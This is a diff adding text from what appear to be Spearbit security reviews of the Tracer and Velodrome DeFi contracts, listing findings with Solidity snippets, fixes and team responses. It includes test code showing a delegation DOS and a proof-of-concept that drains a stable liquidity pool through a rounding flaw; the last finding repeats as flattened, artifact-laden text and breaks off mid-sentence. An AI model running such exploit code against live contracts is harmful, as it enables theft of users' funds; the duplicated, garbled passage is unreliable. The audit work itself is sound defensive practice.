Here is an example of a mixup: the comments in getMint() and getBurn() are different while their results should be similar. It seems the comment on getBurn() has reversed settlement and pool tokens.

* @notice Calculates the number of pool tokens to mint, given some settlement token amount and a price
...
* @return Quantity of pool tokens to mint
...
function getMint(bytes16 price, uint256 amount) public pure returns (uint256) { ... }

* @notice Calculate the number of settlement tokens to burn, based on a price and an amount of pool tokens // settlement & pool seem reversed
...
* @return Quantity of pool tokens to burn
...
function getBurn(bytes16 price, uint256 amount) public pure returns (uint256) { ... }

The settlementTokenPrice variable in keeperGas() is misleading, and it is not clear whether it is Eth per Settlement or Settlement per Eth.

contract PoolKeeper is IPoolKeeper, Ownable {
    function keeperGas(..) public view returns (uint256) {
        int256 settlementTokenPrice = IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice();
        ...
    }
}

Recommendation: Consistent terminology should be used throughout the code, and checks should be made to prevent potential mixups. settlementTokenPrice should be changed to settlementPerEth:

  contract PoolKeeper is IPoolKeeper, Ownable {
      function keeperGas(..) public view returns (uint256) {
-         int256 settlementTokenPrice = IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice();
+         int256 settlementPerEth = IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice();
          ...
      }
  }

Tracer: Agreed and valid. Will address.
+5.6.12 Incorrect NatSpec and comments
Severity: Informational
Context: PoolSwapLibraryL283-L293, LeveragedPool.sol#L511, LeveragedPool.sol#L47
Description: Some NatSpec documentation and comments contain incorrect or unclear information.
In PoolSwapLibraryL283-L293, the NatSpec for the isBeforeFrontRunningInterval() function refers to uncommitment, which is no longer supported.

* @notice Returns true if the given timestamp is BEFORE the frontRunningInterval starts,
*         which is allowed for uncommitment.
function isBeforeFrontRunningInterval(...)

In LeveragedPool.sol#L511 the NatSpec for the withdrawQuote() function notes that the pool should not be paused, while the require checks that it is paused.

* @dev Pool must not be paused
function withdrawQuote() ...
{
    require(paused, "Pool is live");
    ...
}

In LeveragedPool.sol#L47 the comment is unclear, as it references a singular update interval but the mapping points to arrays.

// The most recent update interval in which a user committed
mapping(address => uint256[]) public unAggregatedCommitments;

In PoolToken.sol#L16-L23 both the order and the meaning of the documentation are wrong.
• The @param lines order should be switched.
• @param amount Pool tokens to burn should be replaced with @param amount Pool tokens to mint
• @param account Account to burn pool tokens to should be replaced with @param account Account to mint pool tokens to

  /**
   * @notice Mints pool tokens
-  * @param amount Pool tokens to burn
-  * @param account Account to burn pool tokens to
+  * @param account Account to mint pool tokens to
+  * @param amount Pool tokens to mint
   */
  function mint(address account, uint256 amount) external override onlyOwner { ... }

In PoolToken.sol#L25-L32 the order of the @param lines is reversed.

  /**
   * @notice Burns pool tokens
-  * @param amount Pool tokens to burn
-  * @param account Account to burn pool tokens from
+  * @param account Account to burn pool tokens from
+  * @param amount Pool tokens to burn
   */
  function burn(address account, uint256 amount) external override onlyOwner { ... }

In PoolFactory.sol#L176-L203 the NatSpec @param for poolOwner is missing. It is also suggested to change the parameter name from poolOwner to pool, since the parameter received from deployPool is the address of the pool and not the owner of the pool.

  /**
   * @notice Deploy a contract for pool tokens
+  * @param pool The pool address, owner of the Pool Token
   * @param leverage Amount of leverage for pool
   * @param deploymentParameters Deployment parameters for parent function
   * @param direction Long or short token, L- or S-
   * @return Address of the pool token
   */
  function deployPairToken(
-     address poolOwner,
+     address pool,
      string memory leverage,
      PoolDeployment memory deploymentParameters,
      string memory direction
  ) internal returns (address) {
      ...
-     pairToken.initialize(poolOwner, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals);
+     pairToken.initialize(pool, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals);
      ...
  }

In PoolSwapLibrary.sol#L433-L454 the comments for two of the parameters of function getMintWithBurns() are reversed.

* @param amount ...
* @param oppositePrice ...
...
function getMintWithBurns(
    ...
    bytes16 oppositePrice,
    uint256 amount,
    ...
) public pure returns (uint256) {
    ...

In ERC20_Cloneable.sol#L46-L49 a comment at the constructor of contract ERC20_Cloneable mentions a default value of 18 for decimals. However, it doesn't use this default value, but the supplied parameter. Moreover, a comment at the constructor of the ERC20_Cloneable contract mentions _setupDecimals. This is probably a reference to an old version of the OpenZeppelin ERC20 contracts, and no longer relevant. Additionally, the comments say the values are immutable, but they are set in the initialize() function.

* @dev Sets the values for {name} and {symbol}, initializes {decimals} with
* a default value of 18.
*
* To select a different value for {decimals}, use {_setupDecimals}.
*
* All three of these values are immutable: they can only be set once during
* construction.
...
constructor(string memory name_, string memory symbol_, uint8 decimals_) ERC20(name_, symbol_) {
    _decimals = decimals_;
}

function initialize(address _pool, string memory name_, string memory symbol_, uint8 decimals_)
    external initializer
{
    owner = _pool;
    _name = name_;
    _symbol = symbol_;
    _decimals = decimals_;
}

Recommendation: NatSpec and comments should be corrected.
Tracer: Valid, addressed in issue 376.
Spearbit: Acknowledged.
6 Additional Comments
7 Appendix
diff --git a/findings_newupdate/spearbit/Velodrome-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Velodrome-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..fe632c2
--- /dev/null
+++ b/findings_newupdate/spearbit/Velodrome-Spearbit-Security-Review.txt
@@ -0,0 +1,119 @@
+5.1.1 Reward calculates earned incorrectly on each epoch boundary
Severity: Critical Risk
Context: Reward.sol#L161-L192
Description: Rewards are allocated on a per-epoch basis to users in proportion to their total deposited amount. Because the balance and total supply used for rewards is based on _currTs % WEEK + WEEK, the values will not represent the end of the current epoch, but instead the first second of the next epoch.
As a result, if a user deposits at any epoch boundary, their deposited amount will actually contribute to the checkpointed total supply of the prior epoch. This leads to a few issues, which are detailed below:
• Users who deposit in the first second of the next epoch will dilute the total supply for the prior epoch while not being eligible to claim rewards for that same epoch. Consequently, some rewards will be left unclaimed and locked within the contract, as the tokenRewardsPerEpoch mapping is used to store reward amounts, so unclaimed rewards will not roll over to future epochs.
• Users can also avoid zero numEpochs by depositing a negligible amount at an earlier epoch for multiple accounts before attempting to deposit a larger amount at _currTs % WEEK == 0. The same user can withdraw their deposit from the VotingEscrow contract with the claimed rewards and re-deposit these funds into another account in the same block. They are able to abuse this issue to claim all rewards allocated to each epoch.
• In a similar fashion, reward distributions that are weighted by users' votes in the Voter contract can suffer the same issue as outlined above. If the attacker votes some negligible amount on various pools using several accounts, they can increase the vote, claim, reset the vote and re-vote via another account to claim rewards multiple times.
The math below shows that _currTs + WEEK is indeed the first second of the next epoch and not the last of the prior epoch.
uint256 internal constant WEEK = 7 days;

function epochStart(uint256 timestamp) internal pure returns (uint256) {
    return timestamp - (timestamp % WEEK);
}

epochStart(123)        Type: uint  Hex: 0x0        Decimal: 0
epochStart(100000000)  Type: uint  Hex: 0x5f2b480  Decimal: 99792000
WEEK                   Type: uint  Hex: 0x93a80    Decimal: 604800
epochStart(WEEK)       Type: uint  Hex: 0x93a80    Decimal: 604800
epochStart(1 + WEEK)   Type: uint  Hex: 0x93a80    Decimal: 604800
epochStart(0 + WEEK)   Type: uint  Hex: 0x93a80    Decimal: 604800
epochStart(WEEK - 1)   Type: uint  Hex: 0x0        Decimal: 0

Recommendation: Both lines which query the user's prior balance and total supply for each given epoch can be replaced to check only the last second of the epoch:

  if (numEpochs > 0) {
      for (uint256 i = 0; i < numEpochs; i++) {
          // get index of last checkpoint in this epoch
-         _index = getPriorBalanceIndex(tokenId, _currTs + DURATION);
+         _index = getPriorBalanceIndex(tokenId, _currTs + DURATION - 1);
          // get checkpoint in this epoch
          cp0 = checkpoints[tokenId][_index];
          // get supply of last checkpoint in this epoch
-         _supply = Math.max(supplyCheckpoints[getPriorSupplyIndex(_currTs + DURATION)].supply, 1);
+         _supply = Math.max(supplyCheckpoints[getPriorSupplyIndex(_currTs + DURATION - 1)].supply, 1);
          reward += (cp0.balanceOf * tokenRewardsPerEpoch[token][_currTs]) / _supply;
          _currTs += DURATION;
      }
  }

This will ensure that users who deposit at the start of the following epoch will not be eligible for rewards or dilute the supply when block.timestamp % WEEK == 0.
Velodrome: Fixed in commit 02e0bc.
Spearbit: Verified.
5.2 High Risk
+5.2.1 DOS attack by delegating tokens at MAX_DELEGATES = 1024
Severity: High Risk
Context: VotingEscrow.sol#L1212
Description: Any user can delegate the balance of the locked NFT amount to anyone by calling delegate. As the delegated tokens are maintained in an array that's vulnerable to a DOS attack, the VotingEscrow has a safety check of MAX_DELEGATES = 1024, preventing an address from having a huge array. Given the current implementation, any user with 1024 delegated tokens takes approximately 23M gas to transfer/burn/mint a token. However, the current gas limit of the OP chain is 15M (ref: Op-scan).
• The current VotingEscrow has a limit of MAX_DELEGATES = 1024. It takes approximately 23M gas to transfer/withdraw a token when there are 1024 delegated votes on a token.
• It's cheaper to delegate from an address with a shorter token list to an address with a longer token list. => If someone attacks a victim's address by creating a new address, a new lock, and delegating to the victim, then by the time the attacker hits the gas limit, the victim can no longer withdraw/transfer/delegate.
Recommendation: There's currently no clear hard limit on block size in OP's spec. There's also a chance that OP's sequencer will include a jumbo tx if funds get locked because of out-of-gas errors. Nevertheless, there's no precedent for such cases, and it's not a desirable situation for users to deal with these risks. Hence we recommend to:
1. Adjust MAX_DELEGATES = 1024 to 128;
2. Give an option for users to opt out/opt in. Users will only accept the delegated tokens if they opt in; or users can opt out to refuse any uncommissioned delegated tokens.
Also, we recommend adding the following test in VotingEscrow.t.sol:
contract VotingEscrowTest is BaseTest {
    function testDelegateLimitAttack() public {
        vm.prank(address(owner));
        VELO.transfer(address(this), TOKEN_1M);
        VELO.approve(address(escrow), type(uint256).max);
        uint tokenId = escrow.createLock(TOKEN_1, 7 days);
        for (uint256 i = 0; i < escrow.MAX_DELEGATES() - 1; i++) {
            vm.roll(block.number + 1);
            vm.warp(block.timestamp + 2);
            address fakeAccount = address(uint160(420 + i));
            VELO.transfer(fakeAccount, 1 ether);
            vm.startPrank(fakeAccount);
            VELO.approve(address(escrow), type(uint256).max);
            escrow.createLock(1 ether, MAXTIME);
            escrow.delegate(address(this));
            vm.stopPrank();
        }
        vm.roll(block.number + 1);
        vm.warp(block.timestamp + 7 days);
        uint initialGas = gasleft();
        escrow.withdraw(tokenId);
        uint gasUsed = initialGas - gasleft();
        // @audit: setting 10_000_000 to demonstrate the issue. 2~3M gas limit would be a safer range.
        assertLt(gasUsed, 10_000_000);
    }
}

Velodrome: Fixed in commit 0b47fe. Delegation was reworked to use static balances so that it would no longer have a limit. This required the introduction of permanent locks, which are locks that do not decay.
Spearbit: Verified.
+5.2.2 Inflated voting balance due to duplicated veNFTs within a checkpoint
Severity: High Risk
Context: VotingEscrow.sol#L1309, VotingEscrow.sol#L1364
Description: Note: This issue affects the VotingEscrow._moveTokenDelegates and VotingEscrow._moveAllDelegates functions.
A checkpoint can contain duplicated veNFTs (tokenIDs) under certain circumstances, leading to double counting of voting balance. Malicious users could exploit this vulnerability to inflate the voting balance of their accounts and participate in governance and gauge weight voting, potentially causing loss of assets or rewards for other users if the inflated voting balance is used in a malicious manner (e.g. to redirect rewards to gauges where attackers have a vested interest).
Following is the high-level pseudo-code of the existing _moveTokenDelegates function, which is crucial for understanding the issue.
1. Assume we are moving tokenID=888 from Alice to Bob.
2. Source Code Logic (Moving tokenID=888 out of Alice)
• Fetch the existing Alice's token IDs and assign them to srcRepOld
• Create a new empty array = srcRepNew
• Copy all the token IDs in srcRepOld to srcRepNew except for tokenID=888
3. Destination Code Logic (Moving tokenID=888 into Bob)
• Fetch the existing Bob's token IDs and assign them to dstRepOld
• Create a new empty array = dstRepNew
• Copy all the token IDs in dstRepOld to dstRepNew
• Copy tokenID=888 to dstRepNew
The existing logic works fine as long as a new empty array (srcRepNew OR dstRepNew) is created every single time. The code relies on the _findWhatCheckpointToWrite function to return the index of a new checkpoint.

function _moveTokenDelegates(
    ..SNIP..
    uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep);
    uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds;

However, the problem is that the _findWhatCheckpointToWrite function does not always return the index of a new checkpoint (refer to the code below). It will return the last checkpoint if it has already been written once within the same block.
function _findWhatCheckpointToWrite(address account) internal view returns (uint32) {
    uint256 _blockNumber = block.number;
    uint32 _nCheckPoints = numCheckpoints[account];

    if (_nCheckPoints > 0 && _checkpoints[account][_nCheckPoints - 1].fromBlock == _blockNumber) {
        return _nCheckPoints - 1;
    } else {
        return _nCheckPoints;
    }
}

If someone triggers _moveTokenDelegates more than once within the same block (e.g. performs an NFT transfer twice to the same person), the _findWhatCheckpointToWrite function will return a new checkpoint in the first transfer but will return the last/previous checkpoint in the second transfer. This will cause the move token delegate logic to be off during the second transfer.

First Transfer at Block 1000
Assume the following states:

numCheckpoints[Alice] = 1
_checkpoints[Alice][0].tokenIds = [n1, n2] <== Most recent checkpoint
numCheckpoints[Bob] = 1
_checkpoints[Bob][0].tokenIds = [n3] <== Most recent checkpoint

To move tokenID=2 from Alice to Bob, the _moveTokenDelegates(Alice, Bob, n2) function will be triggered. The _findWhatCheckpointToWrite will return the index of 1, which points to a new array. The end states of the first transfer will be as follows:

numCheckpoints[Alice] = 2
_checkpoints[Alice][0].tokenIds = [n1, n2]
_checkpoints[Alice][1].tokenIds = [n1] <== Most recent checkpoint
numCheckpoints[Bob] = 2
_checkpoints[Bob][0].tokenIds = [n3]
_checkpoints[Bob][1].tokenIds = [n2, n3] <== Most recent checkpoint

Everything is working fine at this point in time.

Second Transfer at Block 1000 (same block)
To move tokenID=1 from Alice to Bob, the _moveTokenDelegates(Alice, Bob, n1) function will be triggered. This time round, since the last checkpoint block is the same as the current block, the _findWhatCheckpointToWrite function will return the last checkpoint instead of a new checkpoint. The srcRepNew and dstRepNew will end up referencing the old checkpoint instead of a new checkpoint. As such, the srcRepNew and dstRepNew arrays will reference back to the old checkpoints _checkpoints[Alice][1].tokenIds and _checkpoints[Bob][1].tokenIds respectively. The end state of the second transfer will be as follows:

numCheckpoints[Alice] = 3
_checkpoints[Alice][0].tokenIds = [n1, n2]
_checkpoints[Alice][1].tokenIds = [n1] <== Most recent checkpoint
numCheckpoints[Bob] = 3
_checkpoints[Bob][0].tokenIds = [n3]
_checkpoints[Bob][1].tokenIds = [n2, n3, n2, n3, n1] <== Most recent checkpoint

Four (4) problems could be observed from the end state:
1. The numCheckpoints is incorrect. It should be two (2) instead of three (3).
2. TokenID=1 has been added to Bob's checkpoint, but it has not been removed from Alice's checkpoint.
3. Bob's checkpoint contains duplicated tokenIDs (e.g. there are two TokenID=2 and two TokenID=3).
4. A TokenID is not unique (e.g. a TokenID appears more than once).
Since the token IDs within the checkpoint will be used to determine the voting power, the voting power will be inflated in this case, as there will be a double count of certain NFTs.

function _moveTokenDelegates(
    ..SNIP..
    uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep);
    uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds;

Additional Comment about the nextSrcRepNum variable and the _findWhatCheckpointToWrite function
In Line 1320 below, the code wrongly assumes that the _findWhatCheckpointToWrite function will always return the index of the next new checkpoint.
The _findWhatCheckpointToWrite function will return the index of the latest checkpoint instead of a new one if block.number == checkpoint.fromBlock.

function _moveTokenDelegates(
    address srcRep,
    address dstRep,
    uint256 _tokenId
) internal {
    if (srcRep != dstRep && _tokenId > 0) {
        if (srcRep != address(0)) {
            uint32 srcRepNum = numCheckpoints[srcRep];
            uint256[] storage srcRepOld = srcRepNum > 0
                ? _checkpoints[srcRep][srcRepNum - 1].tokenIds
                : _checkpoints[srcRep][0].tokenIds;
            uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep);
            uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds;

Additional Comment about numCheckpoints
In Line 1330 below, the function computes the new number of checkpoints by incrementing the srcRepNum by one. However, this is incorrect, because if block.number == checkpoint.fromBlock, then the number of checkpoints remains the same and does not increment.

function _moveTokenDelegates(
    address srcRep,
    address dstRep,
    uint256 _tokenId
) internal {
    if (srcRep != dstRep && _tokenId > 0) {
        if (srcRep != address(0)) {
            uint32 srcRepNum = numCheckpoints[srcRep];
            uint256[] storage srcRepOld = srcRepNum > 0
                ? _checkpoints[srcRep][srcRepNum - 1].tokenIds
                : _checkpoints[srcRep][0].tokenIds;
            uint32 nextSrcRepNum = _findWhatCheckpointToWrite(srcRep);
            uint256[] storage srcRepNew = _checkpoints[srcRep][nextSrcRepNum].tokenIds;
            // All the same except _tokenId
            for (uint256 i = 0; i < srcRepOld.length; i++) {
                uint256 tId = srcRepOld[i];
                if (tId != _tokenId) {
                    srcRepNew.push(tId);
                }
            }
            numCheckpoints[srcRep] = srcRepNum + 1;
        }

Recommendation: Update the move token delegate logic within the affected functions (VotingEscrow._moveTokenDelegates and VotingEscrow._moveAllDelegates) to ensure that the latest checkpoint is overwritten correctly when the functions are triggered more than once within a single block. Further, ensure that the following invariants hold in the new code:
• No duplicated veNFTs (tokenIDs) within a checkpoint
• When moving a tokenID, it must be deleted from the source tokenIds list and added to the destination tokenIds list
• No more than one checkpoint within the same block for an account. Otherwise, the binary search within the VotingEscrow.getPastVotesIndex will return an incorrect number of votes
Sidenote: Another separate issue is that the fromBlock of a checkpoint is not set anywhere in the codebase. Therefore, the _findWhatCheckpointToWrite function will always create and return a new checkpoint, which is not working as intended. This issue is raised in another finding, "The fromBlock variable of a checkpoint is not initialized". Since the remediation of this issue also depends on fixing the fromBlock problem, it is highlighted here again for visibility.
Velodrome: Fixed in commit a670bf.
Spearbit: Verified.
+5.2.3 Rebase rewards cannot be claimed after a veNFT expires
Severity: High Risk
Context: RewardsDistributor.sol#L271, RewardsDistributor.sol#L283
Description: Note: This issue affects both the RewardsDistributor.claim and RewardsDistributor.claimMany functions.
A user will claim their rebase rewards via the RewardsDistributor.claim function, which will trigger the VotingEscrow.deposit_for function.
function claim(uint256 _tokenId) external returns (uint256) {
    if (block.timestamp >= timeCursor) _checkpointTotalSupply();
    uint256 _lastTokenTime = lastTokenTime;
    _lastTokenTime = (_lastTokenTime / WEEK) * WEEK;
    uint256 amount = _claim(_tokenId, _lastTokenTime);
    if (amount != 0) {
        IVotingEscrow(ve).depositFor(_tokenId, amount);
        tokenLastBalance -= amount;
    }
    return amount;
}

Within the VotingEscrow.deposit_for function, the require statement at line 812 below will verify that the veNFT performing the claim has not expired yet.

function depositFor(uint256 _tokenId, uint256 _value) external nonReentrant {
    LockedBalance memory oldLocked = _locked[_tokenId];
    require(_value > 0, "VotingEscrow: zero amount");
    require(oldLocked.amount > 0, "VotingEscrow: no existing lock found");
    require(oldLocked.end > block.timestamp, "VotingEscrow: cannot add to expired lock, withdraw");
    _depositFor(_tokenId, _value, 0, oldLocked, DepositType.DEPOSIT_FOR_TYPE);
}

If a user claims the rebase rewards after their veNFT's lock has expired, the VotingEscrow.depositFor function will always revert. As a result, the accumulated rebase rewards will be stuck in the RewardsDistributor contract and users will not be able to retrieve them.
Recommendation: Consider sending the claimed VELO rewards to the owner of the veNFT if the veNFT's lock has already expired.

  function claim(uint256 _tokenId) external returns (uint256) {
      if (block.timestamp >= timeCursor) _checkpointTotalSupply();
      uint256 _lastTokenTime = lastTokenTime;
      _lastTokenTime = (_lastTokenTime / WEEK) * WEEK;
      uint256 amount = _claim(_tokenId, _lastTokenTime);
      if (amount != 0) {
-         IVotingEscrow(ve).depositFor(_tokenId, amount);
+         IVotingEscrow.LockedBalance memory _locked = IVotingEscrow(ve).locked(_tokenId);
+         if (_locked.end < block.timestamp) {
+             address _nftOwner = IVotingEscrow(ve).ownerOf(_tokenId);
+             IERC20(token).transfer(_nftOwner, amount);
+         } else {
+             IVotingEscrow(ve).depositFor(_tokenId, amount);
+         }
          tokenLastBalance -= amount;
      }
      return amount;
  }

Velodrome: Fixed in commit 8a71a8.
Spearbit: Verified.
+5.2.4 Claimed rebase rewards of managed NFT are not compounded within LockedManagedReward
Severity: High Risk
Context: VotingEscrow.sol#L165, RewardsDistributor.sol#L271
Description: Rebase rewards of a managed NFT should be compounded within the LockedManagedRewards contract. However, this is not currently implemented. When someone calls RewardsDistributor.claim with a managed NFT, the claimed rebase rewards will be locked via the VotingEscrow.depositFor function (refer to Line 277 below). However, the VotingEscrow.depositFor function fails to notify the LockedManagedRewards contract of the incoming rewards. Thus, the rewards do not accrue in the LockedManagedRewards.

function claim(uint256 _tokenId) external returns (uint256) {
    if (block.timestamp >= timeCursor) _checkpointTotalSupply();
    uint256 _lastTokenTime = lastTokenTime;
    _lastTokenTime = (_lastTokenTime / WEEK) * WEEK;
    uint256 amount = _claim(_tokenId, _lastTokenTime);
    if (amount != 0) {
        IVotingEscrow(ve).depositFor(_tokenId, amount);
        tokenLastBalance -= amount;
    }
    return amount;
}

One of the purposes of the LockedManagedRewards contract is to accrue rebase rewards claimed by the managed NFT, so that users receive their pro-rata portion of the rebase rewards, based on their contribution to the managed NFT, when they withdraw their normal NFTs from the managed NFT via the VotingEscrow.withdrawManaged function.
/// @inheritdoc IVotingEscrow
function withdrawManaged(uint256 _tokenId) external nonReentrant {
    ..SNIP..
    uint256 _reward = IReward(_lockedManagedReward).earned(address(token), _tokenId);
    ..SNIP..
    // claim locked rewards (rebases + compounded reward)
    address[] memory rewards = new address[](1);
    rewards[0] = address(token);
    IReward(_lockedManagedReward).getReward(_tokenId, rewards);

If the rebase rewards are not accrued in the LockedManagedRewards, users will not receive their pro-rata portion of the rebase rewards during withdrawal.
Recommendation: Ensure that rebase rewards claimed by a managed NFT are accrued to the LockedManagedRewards contract. The depositFor function could be modified so that any deposit to a managed NFT will notify the LockedManagedRewards contract.
Velodrome: Acknowledged and will fix. Fixed in commit 632c36 and commit e98472.
Spearbit: Observed the following fixes in commit 632c36:
• Added validation to ensure that the depositFor function cannot be called against a Locked NFT
• If the depositFor function is called against a Managed NFT, the deposited amount will be treated as locked rewards and it will notify the LockedManagedReward contract
Observed the following fixes in commit e98472:
• The depositFor function cannot be called with a locked NFT
• Only the RewardDistributor can call the depositFor function with a managed NFT
• If the depositFor function is called with a managed NFT, the function will notify the LockedManagedReward contract
Based on the above, it was observed that the claimed rebase rewards of a managed NFT are compounded within the LockedManagedReward contract. Verified.
+5.2.5 Malicious users could deposit normal NFTs to a managed NFT on behalf of others without their permission
Severity: High Risk
Context: VotingEscrow.sol#L130
Description: The VotingEscrow.depositManaged function does not verify that the caller (msg.sender) is the owner of the _tokenId. As a result, a malicious user can deposit normal NFTs to a managed NFT on behalf of others without their permission.

function depositManaged(uint256 _tokenId, uint256 _mTokenId) external nonReentrant {
    require(escrowType[_mTokenId] == EscrowType.MANAGED, "VotingEscrow: can only deposit into managed nft");
    require(!deactivated[_mTokenId], "VotingEscrow: inactive managed nft");
    require(escrowType[_tokenId] == EscrowType.NORMAL, "VotingEscrow: can only deposit normal nft");
    require(!voted[_tokenId], "VotingEscrow: nft voted");
    require(ownershipChange[_tokenId] != block.number, "VotingEscrow: flash nft protection");
    require(_balanceOfNFT(_tokenId, block.timestamp) > 0, "VotingEscrow: no balance to deposit");
    ..SNIP..

The owner of a normal NFT will have their voting balance transferred to a malicious managed NFT, resulting in loss of rewards and voting power for the victim. Additionally, a malicious owner of a managed NFT could aggregate the voting power of the victims' normal NFTs and perform malicious actions, such as stealing the rewards from the victims or using its inflated voting power to pass malicious proposals.
Recommendation: Implement additional validation to ensure that the caller is the owner of the deposited NFT.

  function depositManaged(uint256 _tokenId, uint256 _mTokenId) external nonReentrant {
+     address sender = _msgSender();
+     require(_isApprovedOrOwner(sender, _tokenId), "VotingEscrow: not owner or approved");
      require(escrowType[_mTokenId] == EscrowType.MANAGED, "VotingEscrow: can only deposit into managed nft");
      require(!deactivated[_mTokenId], "VotingEscrow: inactive managed nft");
      ..SNIP..

Velodrome: Acknowledged and will fix. Fixed in commit 712e14.
Spearbit: Verified.
+5.2.6 First liquidity provider of a stable pair can DOS the pool
Severity: High Risk
Context: Pair.sol#L504, Pair.sol#L353
Description: The invariant k of a stable pool is calculated as follows (Pair.sol#L505):

function _k(uint256 x, uint256 y) internal view returns (uint256) {
    if (stable) {
        uint256 _x = (x * 1e18) / decimals0;
        uint256 _y = (y * 1e18) / decimals1;
        uint256 _a = (_x * _y) / 1e18;
        uint256 _b = ((_x * _x) / 1e18 + (_y * _y) / 1e18);
        return (_a * _b) / 1e18; // x3y+y3x >= k
    } else {
        return x * y; // xy >= k
    }
}

The value _a = (_x * _y) / 1e18 rounds down to 0 when _x * _y < 1e18. This rounding error can lead to the invariant k of stable pools being zero, in which case a trader can steal whatever is left in the pool.
The first liquidity provider can DOS the pair by: 1. minting a small amount of liquidity to the pool, 2. stealing whatever is left in the pool, and 3. repeating steps 1 and 2 until the total supply overflows.
To prevent this rounding-error issue, the reserves of a pool should never become too small. The mint function, which was borrowed from UniswapV2, has a minimum liquidity check of sqrt(a * b) > MINIMUM_LIQUIDITY. This, however, isn't safe enough to protect the invariant formula of stable pools (Pair.sol#L344-L363).

uint256 internal constant MINIMUM_LIQUIDITY = 10**3;
// ...
function mint(address to) external nonReentrant returns (uint256 liquidity) {
    // ...
    uint256 _amount0 = _balance0 - _reserve0;
    uint256 _amount1 = _balance1 - _reserve1;
    uint256 _totalSupply = totalSupply();
    if (_totalSupply == 0) {
        liquidity = Math.sqrt(_amount0 * _amount1) - MINIMUM_LIQUIDITY; //@audit what about the fee?
        _mint(address(1), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens - cannot be address(0)
    // ...
}

This is the POC of an exploit, extended from Pair.t.sol:
Velodrome: Acknowledged and will fix. Fixed in commit 712e14. Spearbit: Verified. +5.2.6 First liquidity provider of a stable pair can DOS the pool Severity: High Risk Context: Pair.sol#L504, Pair.sol#L353 Description: The invariant k of a stable pool is calculated as follows Pair.sol#L505 function _k(uint256 x, uint256 y) internal view returns (uint256) { if (stable) { uint256 _x = (x * 1e18) / decimals0; uint256 _y = (y * 1e18) / decimals1; uint256 _a = (_x * _y) / 1e18; uint256 _b = ((_x * _x) / 1e18 + (_y * _y) / 1e18); return (_a * _b) / 1e18; // x3y+y3x >= k } else { return x * y; // xy >= k } } The value of _a = (x * y ) / 1e18 = 0 due to rounding error when x*y < 1e18. The rounding error can lead to the invariant k of stable pools equals zero, and the trader can steal whatever is left in the pool. The first liquidity provider can DOS the pair by: 1.mint a small amount of liquidity to the pool, 2. Steal whatever is left in the pool, 3. Repeat step 1, and step 2 until the overflow of the total supply. To prevent the issue of rounding error, the reserve of a pool should never go too small. The mint function which was borrowed from uniswapV2 has a minimum liquidity check of sqrt(a * b) > MINIMUM_LIQUIDITY; This, however, isn't safe enough to protect the invariant formula of stable pools. Pair.sol#L344-L363 uint256 internal constant MINIMUM_LIQUIDITY = 10**3; // ... function mint(address to) external nonReentrant returns (uint256 liquidity) { // ... uint256 _amount0 = _balance0 - _reserve0; uint256 _amount1 = _balance1 - _reserve1; uint256 _totalSupply = totalSupply(); if (_totalSupply == 0) { liquidity = Math.sqrt(_amount0 * _amount1) - MINIMUM_LIQUIDITY; //@audit what about the fee? _mint(address(1), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens - ,! cannot be address(0) // ... } This is the POC of an exploit extended from Pair.t.sol 15 contract PairTest is BaseTest { // ... 
function drainPair(Pair pair, uint initialFraxAmount, uint initialDaiAmount) internal { DAI.transfer(address(pair), 1); uint amount0; uint amount1; if (address(DAI) < address(FRAX)) { amount0 = 0; amount1 = initialFraxAmount - 1; } else { amount1 = 0; amount0 = initialFraxAmount - 1; } pair.swap(amount0, amount1, address(this), new bytes(0)); FRAX.transfer(address(pair), 1); if (address(DAI) < address(FRAX)) { amount0 = initialDaiAmount; // initialDaiAmount + 1 - 1 amount1 = 0; } else { amount1 = initialDaiAmount; // initialDaiAmount + 1 - 1 amount0 = 0; } pair.swap(amount0, amount1, address(this), new bytes(0)); } function testDestroyPair() public { deployCoins(); deal(address(DAI), address(this), 100 ether); deal(address(FRAX), address(this), 100 ether); deployFactories(); Pair pair = Pair(factory.createPair(address(DAI), address(FRAX), true)); for(uint i = 0; i < 10; i++) { DAI.transfer(address(pair), 10_000_000); FRAX.transfer(address(pair), 10_000_000); // as long as 10_000_000^2 < 1e18 uint liquidity = pair.mint(address(this)); console.log("pair:", address(pair), "liquidity:", liquidity); console.log("total liq:", pair.balanceOf(address(this))); drainPair(pair, FRAX.balanceOf(address(pair)) , DAI.balanceOf(address(pair))); console.log("DAI balance:", DAI.balanceOf(address(pair))); console.log("FRAX balance:", FRAX.balanceOf(address(pair))); require(DAI.balanceOf(address(pair)) == 1, "should drain DAI balance"); require(FRAX.balanceOf(address(pair)) == 2, "should drain FRAX balance"); } DAI.transfer(address(pair), 1 ether); FRAX.transfer(address(pair), 1 ether); vm.expectRevert(); pair.mint(address(this)); } } Recommendation: Recommend to add two restrictions on the first lp of stable pools: 1. only allows equal amounts of liquidity. 2. invariant _k should be larger than the MINIMUM_K 16 function mint(address to) external nonReentrant returns (uint256 liquidity) { // ... if (_totalSupply == 0) { liquidity = Math.sqrt(_amount0 * _amount1) - MINIMUM_LIQUIDITY; _mint(address(1), MINIMUM_LIQUIDITY); // permanently lock the first MINIMUM_LIQUIDITY tokens - cannot be address(0) ,! if (stable) { require(_amount0 * 1e18 / decimals0 == _amount1 * 1e18 / decimals1, "Pair: Stable pair must be equal amounts"); require(_k(_amount0, _amount1) > MINIMUM_K, "Pair: Stable pair must be above minimum k"); } // ... } + + ,! + ,! + } Velodrome: I agree with this finding. MINIMUM_K is not specified, but I assume it to be equal to zero. We will fix it. Is there any reason why the initial deposit must be equal? In practice, stable pools often aren't perfectly 1:1 pegged, and if the difference is significant, this change will guarantee that the initial deposit will always be small. It may not make much difference but just want to know all the thinking behind it. Spearbit: Agreed that enforcing the 1:1 ratio forces first lp lose money in many cases. We can 